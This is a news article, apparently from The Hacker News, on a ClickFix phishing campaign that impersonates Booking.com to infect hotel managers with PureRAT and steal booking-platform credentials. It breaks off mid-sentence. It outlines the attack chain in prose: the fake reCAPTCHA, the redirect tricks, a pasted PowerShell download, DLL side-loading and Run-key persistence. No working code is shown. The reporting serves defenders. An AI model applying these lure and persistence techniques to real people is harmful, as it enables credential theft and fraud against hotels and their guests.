Large-scale Clickfix Phishing Attacks Target Hotel Systems With...
Cybersecurity researchers have called attention to a massive phishing campaign targeting the hospitality industry that lures hotel managers to ClickFix-style pages and harvest their credentials by deploying malware like PureRAT.
"The attacker's modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments," Sekoia said. "This campaign leverages spear-phishing emails that impersonate Booking.com to redirect victims to malicious websites, employing the ClickFix social engineering tactic to deploy PureRAT."
The end goal of the campaign is to steal credentials from compromised systems that grant threat actors unauthorized access to booking platforms like Booking.com or Expedia, which are then either sold on cybercrime forums or used to send fraudulent emails to hotel customers to conduct fraud.
The activity is assessed to be active since at least April 2025 and operational as of early October 2025. It's one of the several campaigns that has been observed targeting, including a set of attacks that was documented by Microsoft earlier this March.
In the latest wave analyzed by the French cybersecurity company, emails messages are sent from a compromised email account to target several hotels across multiple countries, tricking recipients into clicking on bogus links that triggers a redirection chain to a ClickFix page with a supposed reCAPTCHA challenge to "ensure the security of your connection."
"Upon visiting, the URL redirects users to a web page hosting a JavaScript with an asynchronous function that, after a brief delay, checks whether the page was displayed inside an iframe," Sekoia explained. "The objective is to redirect the user to the same URL but over HTTP."
This causes the victim to copy and execute a malicious PowerShell command that gathers system information and downloads a ZIP archive, which, in turn, contains a binary that ultimately sets up persistence and loads PureRAT (aka zgRAT) by means of DLL side-loading.
The modular malware supports a wide range of features, such as remote access, mouse and keyboard control, webcam and microphone capture, keylogging, file upload/download, traffic proxying, data exfiltration, and remote execution of commands or binaries. It's also protected by .NET Reactor to complicate reverse engineering and also establishes persistence on the host by creating a Run registry key.
Furthermore, the campaign has been found to approach hotel customers via Whats
Source: The Hacker News
